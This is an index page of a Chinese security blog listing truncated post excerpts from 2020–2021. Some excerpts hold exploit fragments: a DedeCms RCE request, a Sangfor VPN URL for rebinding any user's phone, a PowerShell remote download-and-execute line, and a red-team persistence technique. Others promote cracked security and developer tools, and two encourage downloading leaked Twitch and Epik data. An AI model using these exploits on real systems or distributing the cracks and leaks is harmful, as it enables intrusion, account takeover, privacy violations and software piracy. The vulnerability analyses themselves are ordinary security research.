JetBrainsUnlimitedTrial:无限激活试用

2021-10-24 / 0 评论 / 42 浏览 / Mrxn

激活效果如下,分别是 pycharm 和 goland :   只需要在终端执行(这里是 Mac,Windows 的自行更换安装路径即可): java -jar JetBrainsUnlimitedTrial-1.4-release-sha1-daf1682106e6aae5e40d0e6d3aaac38...

interactsh:一款比 DNSLOG 更好用的反链检测平台

2021-10-15 / 0 评论 / 391 浏览 / Mrxn

interactsh 简介: interactsh 是来自 github 上有名的开源软件组织 projectdiscovery 开发的一款在线反链检测(DNS盲注等等不回显的检测)平台,功能强大,包含 DNSLOG 的功能,且优于它。这个组织还开源了其他的有名的安全软件:httpx、nuclei、Subfinder 等;其开发语...

Mac 下解决默认安装后 wireshark 抓包提示 you don't have permission 的权限问题

2021-10-14 / 0 评论 / 390 浏览 / Mrxn

Mac 下安装好 wireshark 抓包软件后,打开会提示:you don't hava permission to capture on local interfaces. you can fix this by instaling ChmodBPF .可是当你按照提示安装好 ChmodBPF 后打开 wireshark 依然还是会提示你这个一样的错误。...

疑似 Twitch.tv 发生数据泄露 128GB 文件的种子在暗网泄露

2021-10-6 / 0 评论 / 735 浏览 / Mrxn

重点:数据泄露. 疑似  Twitch.tv  的数据,根据种子名称看只是流露出的第一部分。各位自行下载斟酌。 下载方法在 之前的这篇文章说过了,不重复。 目录内容以及大小如下: └── [5.1K] twitch-leaks-part-one ├── [ 15K] 3rdparty.zip ...

DedeCms V5.8.1 RCE 漏洞

2021-10-1 / 0 评论 / 898 浏览 / Mrxn

昨天在一个老外的博客看到了他的一篇文章,讲的就是DedeCms 的预览版本 V5.8.1 存在 RCE 漏洞(远程代码执行漏洞);我刚刚复现了下,确实是存在的。 POC: GET /plus/flink.php?dopost=save&c=pwd HTTP/1.1 Host: dedecms.test ...

update-golang:一个帮助你快速安装或者更新到最新版 golang 的 Linux 脚本

2021-9-29 / 0 评论 / 582 浏览 / Mrxn

前言: 自己的服务器,或者是朋友的服务器,每次想编译 golang 的程序的时候,总是按照既定的步骤去官网下载-解压-安装-添加到环境变量里面,重复的劳动还是恼火。遂想自己写个安装脚本,但是在浏览 github 的时候,发现已经有人写好了的脚本,那就是 update-golang 。 简介: update-golang 是...

Mac虚拟机Parallels Desktop 16在 MacOS big sur 下不能联网和 usb 的问题解决-附Parallels Desktop 16 和 17 无限试用版下载

2021-9-25 / 0 评论 / 811 浏览 / Mrxn

因为底层修改的原因,Parallels Desktop 15 无法在Big Sur上运行,最新的 Parallels Desktop 16 (有钱推荐正版,无此问题)在 Big Sur 下运行会有无法联网的问题,会提示“您的虚拟机将继续正常运作 但将无法连接网络。”,以及使用USB也会有问题。 一段时间都无法解决此问题,最新网上有一个别致的解决方...

彻底关闭 Firefox(火狐浏览器)的警告提示-警告:面临潜在的安全风险

2021-9-21 / 0 评论 / 1009 浏览 / Mrxn

前言: 有的时候我们访问某些网站,特别是对于证书过期或者是证书和域名不符合的时候,会提示:警告:面临潜在的安全风险! Firefox 检测到潜在的安全威胁,因此没有继续访问 www.xxxx.com。若您访问此网站,攻击者可能会尝试窃取您的密码、电子邮件、信用卡等信息。 您可以做什么? 这个问题大多与网站有关,无法通过您的操作解决...

Anonymous曝光域名注册提供商Epik 180GB数据-附下载链接

2021-9-17 / 0 评论 / 1312 浏览 / Mrxn

点进来的人也是想下载,不明白的就看 Anonymous 原文: ***************************************************************************************** ________ __ .__ ...

xray最新版1.4.2Windows&Linux&Mac 64位 社区高级版

2020-11-12 / 21 评论 / 17401 浏览 / Mrxn

首先感谢 长亭科技 提供 xray 这款非常方便非常好用的安全工具 俗话说:没有人破解的工具不是好工具 根据没有任何数据支持的统计,大部分安全研究人员使用的安全工具都是盗版 包括但不限于: IDA \ JEB \ BurpSuite \ Vmware 截至目前xray最新版的 ...

禅道≤12.4.2后台getshell漏洞复现分析

2020-10-25 / 0 评论 / 7773 浏览 / Mrxn

简单的介绍下禅道: 禅道 项目管理软件 是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期管理。 首先搭建环境,安装禅道12.4.2,开源版下载:https://www.zentao.net/dynamic/zentaopms12.4.2-80263.htm...

蓝队技巧:查找被隐藏的Windows服务项

2020-10-23 / 0 评论 / 4846 浏览 / Mrxn

在上篇,我们说过红队技巧:隐藏windows服务,今天抽空来更新下,如何查找这类隐藏的Windows服务项。 首先看下效果,使用powershell远程下载执行直接获得隐藏的Windows服务名称: 通过远程下载执行无文件落地查看隐藏Windows服务: powershell -c "IEX (New-Object Net.WebClient)....

emlog 6.0特别版的BUG些

2020-10-21 / 5 评论 / 4183 浏览 / Mrxn

声明:本文仅供爱好者折腾参阅,且由于我这是我很久之前的手记,如有遗漏,表意不明的请多包涵。 一点关于安装出现错误编号2002的可能办法:   第一个就是发文章标签打不上之数据库标签表 emlog_tag 从emlog5.3.1升级过来或者是自己瞎折腾后发现发文章标签打不上或者没了的多半是这个原因。 gid ...

Nessus v8.9.1 系列的最新(20211012)插件更新方法说明

2020-10-17 / 50 评论 / 14849 浏览 / Mrxn

之前写个一篇关于Nessus 8.9.1版本在windows上的激活无IP限制的方法文章:Nessus v8.9.1 系列Windows10上安装激活无IP限制版本 其中介绍了详细的安装过程,这里不做重复介绍,需要看的去自行查看,评论里面包含了大部分人的疑惑解答,不懂得可以先看看。 但是,后面还是有很多朋友在我的另一篇 关于Nessus的新插件包...

红队技巧:隐藏windows服务

2020-10-16 / 0 评论 / 4601 浏览 / Mrxn

在后渗透测试中,我们拿到了目标机器的权限后,要想办法维持权限,保持持久,嗯,很重要,不管生活还是工作都需要持久! 利用windows服务来植入我们的后门也是一种常见的利用方式,但是往往一般植入的服务很容易被管理员在任务管理器看到。如果可以隐藏的话,就大大提高了我们的持久性,今天就介绍下一种利用powershell来进行隐藏windows服务的技巧...

乔布斯弥留之际关于生命意义的最后遗言

2020-10-15 / 1 评论 / 3769 浏览 / Mrxn

I reached the pinnacle of success in the business world. In others’ eyes, my life is an epitome of success. 我在商界的成功抵达顶峰,在别人的眼中,我是他们的榜样。 However, aside from work, I...

零组镜像打包下载 零组文章下载(截止到2020年3月的版本和2020年09月19日版本)

2020-10-14 / 1 评论 / 6751 浏览 / Mrxn

web安全 74cms ActiveMQ Adminer Adobe ColdFusion Apache Apache Dubbo Apache FusionAuth Apache HTTPD Apache Log4j Apache SS...

fastadmin(V1.0.0.20200506_beta)前台getshell(文件上传解析)漏洞分析

2020-9-21 / 0 评论 / 5976 浏览 / Mrxn

0x1.简介 FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。 补天平台介绍:近日,补天漏洞响应平台监测到互联网上出现Fastadmin文件上传漏洞,exp被公开。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题,可导致文件上传并解析为可执行文件。目前厂商已发布新版本修复此漏洞,补...

深信服VPN 修改任意账户绑定手机号

2020-9-18 / 0 评论 / 5111 浏览 / Mrxn

https://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1 注意 需要登录之后才可以阅读全文>...

ThinkAdmin v5和v6 未授权列目录/任意文件读取(CVE-2020-25540)

2020-9-16 / 0 评论 / 5164 浏览 / Mrxn

首先声明:内容来自ThinkAdmin的GitHub的官方项目的issue 由 @Hzllaga 师傅提供. 0x1.漏洞简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 0x2...

CVE-2020-1472: NetLogon特权提升漏洞(接管域控制器)

2020-9-15 / 0 评论 / 4375 浏览 / Mrxn

0x01 更新概览 2020年09月14日,360CERT监测发现 secura 公开了针对该漏洞研究报告及PoC,可造成 权限提升影响。本次更新标识该漏洞的利用工具公开,并可能在短时间内出现攻击态势。 具体更新详情可参考: 漏洞验证 0x02 漏洞简述 2020年08月12日, 360CERT监测发现 W...

1 2 3 4 5 6 ... »